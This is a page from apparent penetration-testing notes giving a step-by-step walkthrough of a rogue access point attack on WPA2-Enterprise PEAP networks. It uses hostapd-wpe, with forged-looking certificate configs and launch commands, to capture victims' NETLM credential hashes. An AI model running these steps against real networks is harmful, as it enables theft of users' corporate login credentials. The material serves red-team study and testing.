Hacking Notes
  • What is this?
  • Reconnaissance πŸ—£
    • Information Gathering πŸ—£
  • Enumeration 🎯
    • Host Discovery πŸ›Ž
    • DNS Enumeration
    • OS Discovery πŸ–₯
    • Port Scanning πŸ“Ÿ
    • WAF Evasion
  • Web πŸ“±
    • Unrestricted File Upload
    • Templates Injections βœ–οΈ
    • File Inclusion
    • Login Panes
    • SQL Injection
    • NoSQL Injection
    • OAuth 2.0 Bypass
  • Privilege Escalation
    • Linux Privesc
    • Windows Privesc
    • Run Commands AS
  • Post Explotation πŸ’€
    • Port Forwarding and Tunneling
    • Transfering Files πŸ“€
    • Reverse Shell πŸ”™
    • Crypto 101 πŸ‘
    • AV Evasion
    • Bypass UAC
    • Get Credentials
  • Services
    • PORT 21/tcp - FTP
    • PORT 25/tcp - SMTP
    • PORT 53/tcp/udp - DNS
    • Port 80,443/tcp - HTTP
    • Port 111/tcp - RPCBind
    • PORT 143,993/tcp - IMAP
    • PORT 139,445/tcp - SMB
    • PORT 161/udp - SNMP
    • PORT 1100/tcp - Java RMI
    • PORT 1433/tcp - Microsoft SQL Server
    • PORT 2049/tcp - NFS
    • PORT 3306/tcp MySQL
    • PORT 3389/tcp RDP
    • PyPI Server
  • Software
    • Tomcat
    • Jenkins
    • Drupal
    • Wordpress
  • Client-Side Attacks
    • Evil PDF
    • Microsoft Office Macros
  • Other
    • Hacking WiFI
      • WPA/WPA2 PSK
      • WPA/WPA2 PEAP (Enterprise)
      • WEP
    • Hacking with Powershell
    • Hacking AWS
  • Exploiting
    • Buffer Overflow
  • Active Directory
    • πŸ–₯️AD Attacks
Powered by GitBook
On this page
  • EvilTwin
  • Configuring Certificates
  • Configuring te Fake AP
  • Launch & wait for s3crets

Was this helpful?

  1. Other
  2. Hacking WiFI

WPA/WPA2 PEAP (Enterprise)

PreviousWPA/WPA2 PSKNextWEP

Last updated 3 years ago

Was this helpful?

In networks with WPA2 PEAP which means Enterprise don't use a pre shared key, the users authenticate with the LDAP credentials. As the router or AP doesn't know if the credentials are correct or not, it delegate to a RADIUS server. The handshake can't not be capture because the authentication is not completed by the server so instead of capturing the handshake we will create a EvilTwin but in this case with authentication (Which we are interesting to capture, remember that there are LDAP credentials).

EvilTwin

To carry out this task, we are going to use hostapd-wpe software.

Configuring Certificates

First we need to aclare that when the user will authenticate to our fake AP, some information about the certificate will be displayed, in order to cheat our vΓ­ctims, the certificate will seems as much real as posible.

So we need to modify the following files:

  • /etc/hostapd-wpe/certs/server.cnf

[server]
countryName             = ES
stateOrProvinceName     = Salamanca
localityName            = Salamanca
organizationName        = Red Team Inc.
emailAddress            = admin@redteam.com
commonName              = "Certificado de Red Team Inc."

  • /etc/hostapd-wpe/certs/client.cnf

[client]
countryName             = ES
stateOrProvinceName     = Salamanca
localityName            = Salamanca
organizationName        = Red Team Inc.
emailAddress            = user@redteam.com
commonName              = user@redteam.com

  • /etc/hostapd-wpe/certs/ca.cnf

[certificate_authority]
countryName             = ES
stateOrProvinceName     = Salamanca
localityName            = Salamanca
organizationName        = Red Team Inc.
emailAddress            = admin@redteam.com
commonName              = "Entidad certificadora de Red Team Inc."

Finally, we just need to create it with bootstrap.

/etc/hostapd-wpe/certs/bootstrap

Configuring te Fake AP

Onced configured and created the certificates, the final step is to configure our FAKE AP. We need to create a backup of the default hostapd config file and modify it.

cp /etc/hostapd-wpe/hostapd-wpe.conf /etc/hostapd-wpe/redteam.conf
vim /etc/hostapd-wpe/redteam.conf

#Modify the following values:

interface=<IFACE>
ssid=<ESSID>
channel=<CHANNEL>

Launch & wait for s3crets

Finally, just launch the hostapd-wpe indicating the modified configuration file.

hostapd-wpe /etc/hostapd-wpe/redteam.conf

When the victim falls into our trap, we can obtain their NETLM hash.

WPA2 PEAP Message Exchange